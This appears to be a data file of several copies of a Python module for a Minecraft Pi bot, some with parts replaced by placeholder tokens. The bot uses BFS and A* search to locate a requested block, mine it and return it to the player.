{_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n return rtn\n\n def 
_surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block_\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos(\n ) + player_loc) / 2,), 'kwargs': {'block_': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block_ is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n \"\"\"Return whether or not this location holds the target block.\"\"\"\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_ is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\n<function token>\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot_pos.x, bot_pos.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n 
if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block_ is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n return rtn\n\n def 
_surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block_\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos(\n ) + player_loc) / 2,), 'kwargs': {'block_': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block_ is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n \"\"\"Return whether or not this location holds the target block.\"\"\"\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_ is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\n<function token>\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot_pos.x, bot_pos.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n 
if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n
        legal actions that don't involve placing the block.\"\"\"\n
        return (self._get_move_actions(block_) + self._get_mine_actions() +\n
            self._get_placement_actions(block_))\n
\n
    def contains(self, block_):\n
        \"\"\"Return whether or not the bot contains the block id.\"\"\"\n
        return block_ in self._inventory\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        raise NotImplementedError\n
\n
    def _place(self, loc, exclude=None, block_=None):\n
        \"\"\"Place a block from the inventory only.\n
\n
        If exclude is not None, place a block that is not 'exclude'.\n
        If block_ is not None, place that block only.\n
        \"\"\"\n
        if not self._inventory:\n
            raise Exception('Inventory empty')\n
        if block_ is None:\n
            for key in self._inventory:\n
                if key != exclude:\n
                    block_ = key\n
                    break\n
            else:\n
                raise Exception(\n
                    'You requested not to place %s, but it is the only block in the inventory.'\n
                    % exclude)\n
        if block_ not in self._inventory:\n
            raise Exception('Block %s is not in the inventory' % block_)\n
        if self._inventory[block_] == 1:\n
            del self._inventory[block_]\n
        else:\n
            self._inventory[block_] -= 1\n
        self._set_block(loc, block_)\n
\n
    def _move_down(self):\n
        \"\"\"Move and mine the block below.\"\"\"\n
        new_pos = self._pos + _Vec3(0, -1, 0)\n
        block_ = self._get_block(new_pos)\n
        if block_ != _WATER:\n
